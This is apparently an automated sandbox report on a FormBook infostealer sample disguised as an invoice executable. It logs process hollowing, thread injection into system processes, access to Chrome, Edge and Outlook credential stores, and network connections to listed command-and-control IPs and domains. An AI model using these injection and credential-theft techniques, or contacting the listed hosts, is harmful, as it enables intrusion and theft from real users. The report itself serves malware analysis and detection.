      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35826179 mov eax, dword ptr fs:[00000030h]4_2_35826179
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3587717A mov eax, dword ptr fs:[00000030h]4_2_3587717A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3587717A mov eax, dword ptr fs:[00000030h]4_2_3587717A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F4080 mov eax, dword ptr fs:[00000030h]4_2_358F4080
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581C090 mov eax, dword ptr fs:[00000030h]4_2_3581C090
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581A093 mov ecx, dword ptr fs:[00000030h]4_2_3581A093
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DB0AF mov eax, dword ptr fs:[00000030h]4_2_358DB0AF
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358600A5 mov eax, dword ptr fs:[00000030h]4_2_358600A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358CF0A5 mov eax, dword ptr fs:[00000030h]4_2_358CF0A5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A60A0 mov eax, dword ptr fs:[00000030h]4_2_358A60A0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F50B7 mov eax, dword ptr fs:[00000030h]4_2_358F50B7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583B0D0 mov eax, dword ptr fs:[00000030h]4_2_3583B0D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B0D6 mov eax, dword ptr fs:[00000030h]4_2_3581B0D6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B0D6 mov eax, dword ptr fs:[00000030h]4_2_3581B0D6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B0D6 mov eax, dword ptr fs:[00000030h]4_2_3581B0D6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581B0D6 mov eax, dword ptr fs:[00000030h]4_2_3581B0D6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D0F0 mov eax, dword ptr fs:[00000030h]4_2_3585D0F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3585D0F0 mov ecx, dword ptr fs:[00000030h]4_2_3585D0F0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581C0F6 mov eax, dword ptr fs:[00000030h]4_2_3581C0F6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358190F8 mov eax, dword ptr fs:[00000030h]4_2_358190F8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358190F8 mov eax, dword ptr fs:[00000030h]4_2_358190F8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358190F8 mov eax, dword ptr fs:[00000030h]4_2_358190F8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358190F8 mov eax, dword ptr fs:[00000030h]4_2_358190F8
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35845004 mov eax, dword ptr fs:[00000030h]4_2_35845004
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35845004 mov ecx, dword ptr fs:[00000030h]4_2_35845004
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35828009 mov eax, dword ptr fs:[00000030h]4_2_35828009
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35862010 mov ecx, dword ptr fs:[00000030h]4_2_35862010
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35850044 mov eax, dword ptr fs:[00000030h]4_2_35850044
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A6040 mov eax, dword ptr fs:[00000030h]4_2_358A6040
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821051 mov eax, dword ptr fs:[00000030h]4_2_35821051
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821051 mov eax, dword ptr fs:[00000030h]4_2_35821051
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358F505B mov eax, dword ptr fs:[00000030h]4_2_358F505B
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35827072 mov eax, dword ptr fs:[00000030h]4_2_35827072
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35826074 mov eax, dword ptr fs:[00000030h]4_2_35826074
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35826074 mov eax, dword ptr fs:[00000030h]4_2_35826074
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821380 mov eax, dword ptr fs:[00000030h]4_2_35821380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821380 mov eax, dword ptr fs:[00000030h]4_2_35821380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821380 mov eax, dword ptr fs:[00000030h]4_2_35821380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821380 mov eax, dword ptr fs:[00000030h]4_2_35821380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35821380 mov eax, dword ptr fs:[00000030h]4_2_35821380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3583F380 mov eax, dword ptr fs:[00000030h]4_2_3583F380
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358DF38A mov eax, dword ptr fs:[00000030h]4_2_358DF38A
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584A390 mov eax, dword ptr fs:[00000030h]4_2_3584A390
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584A390 mov eax, dword ptr fs:[00000030h]4_2_3584A390
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3584A390 mov eax, dword ptr fs:[00000030h]4_2_3584A390
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358293A6 mov eax, dword ptr fs:[00000030h]4_2_358293A6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358293A6 mov eax, dword ptr fs:[00000030h]4_2_358293A6
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3589C3B0 mov eax, dword ptr fs:[00000030h]4_2_3589C3B0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_3581C3C7 mov eax, dword ptr fs:[00000030h]4_2_3581C3C7
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358263CB mov eax, dword ptr fs:[00000030h]4_2_358263CB
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358533D0 mov eax, dword ptr fs:[00000030h]4_2_358533D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358543D0 mov ecx, dword ptr fs:[00000030h]4_2_358543D0
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A43D5 mov eax, dword ptr fs:[00000030h]4_2_358A43D5
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35819303 mov eax, dword ptr fs:[00000030h]4_2_35819303
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_35819303 mov eax, dword ptr fs:[00000030h]4_2_35819303
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 4_2_358A330C mov eax, dword ptr fs:[00000030h]4_2_358A330C
      Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_00405A6E CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,1_2_00405A6E

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 135.148.10.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 160.124.11.52 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 54.159.4.226 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 116.205.156.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.196.84.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.201.13.30 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.131.66 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.117.10.219 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 122.201.127.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 138.68.155.47 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.97.186.228 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.76.156.252 80Jump to behavior
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 670000Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: unknown target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\control.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF74C710000Jump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Windows\SysWOW64\control.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF74C710000 value starts with: 4D5AJump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\AWB_Invoice.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\AWB_Invoice.exeThread register set: target process: 7740Jump to behavior
      Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 4844Jump to behavior
      Source: C:\Users\user\Desktop\AWB_Invoice.exeProcess created: C:\Users\user\Desktop\AWB_Invoice.exe C:\Users\user\Desktop\AWB_Invoice.exeJump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: RAVCpl64.exe, 00000005.00000002.66851859013.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000000.62242516097.0000000000F00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managert
      Source: C:\Users\user\Desktop\AWB_Invoice.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Tries to steal Mail credentials (via file / registry access)
      Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.66849134198.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62278722180.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851913423.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.62378186265.0000000035480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.66851591870.0000000003060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		1
      OS Credential Dumping      		3
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		Exfiltration Over Other Network Medium3
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts1
      Access Token Manipulation      		2
      Obfuscated Files or Information      		LSASS Memory4
      System Information Discovery      		Remote Desktop Protocol1
      Data from Local System      		Exfiltration Over Bluetooth12
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)712
      Process Injection      		1
      Software Packing      		Security Account Manager121
      Security Software Discovery      		SMB/Windows Admin Shares1
      Email Collection      		Automated Exfiltration4
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      DLL Side-Loading      		NTDS12
      Virtualization/Sandbox Evasion      		Distributed Component Object Model1
      Clipboard Data      		Scheduled Transfer5
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Masquerading      		LSA Secrets2
      Process Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common12
      Virtualization/Sandbox Evasion      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Access Token Manipulation      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job712
      Process Injection      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 843118 Sample: AWB_Invoice.exe Startdate: 07/04/2023 Architecture: WINDOWS Score: 100 37 www.vinayakatlantis.com 2->37 39 www.sbreyuyufwkg.top 2->39 41 17 other IPs or domains 2->41 51 Snort IDS alert for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 5 other signatures 2->57 10 AWB_Invoice.exe 1 40 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 31 C:\Users\user\AppData\...\gobject-2.0.dll, PE32+ 10->31 dropped 33 C:\Users\user\AppData\Local\...33MDllHost.exe, PE32 10->33 dropped 35 C:\Users\user\AppData\Local\...\BtvStack.exe, PE32+ 10->35 dropped 69 Tries to detect Any.run 10->69 14 AWB_Invoice.exe 6 10->14         started        signatures6 process7 dnsIp8 49 124.71.228.145, 49852, 80 HWCSNETHuaweiCloudServicedatacenterCN China 14->49 71 Modifies the context of a thread in another process (thread injection) 14->71 73 Tries to detect Any.run 14->73 75 Maps a DLL or memory area into another process 14->75 77 2 other signatures 14->77 18 RAVCpl64.exe 14->18 injected signatures9 process10 process11 20 control.exe 13 18->20         started        signatures12 59 Tries to steal Mail credentials (via file / registry access) 20->59 61 Tries to harvest and steal browser information (history, passwords, etc) 20->61 63 Writes to foreign memory regions 20->63 65 3 other signatures 20->65 23 explorer.exe 2 1 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 43 www.minevisn.com 89.31.143.1, 49891, 49892, 49893 QSC-AG-IPXDE Germany 23->43 45 www.hangthanhlyonline.com 160.124.11.52, 49886, 49887, 49889 POWERLINE-AS-APPOWERLINEDATACENTERHK South Africa 23->45 47 13 other IPs or domains 23->47 67 System process connects to network (likely due to code injection or exploit) 23->67 signatures15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.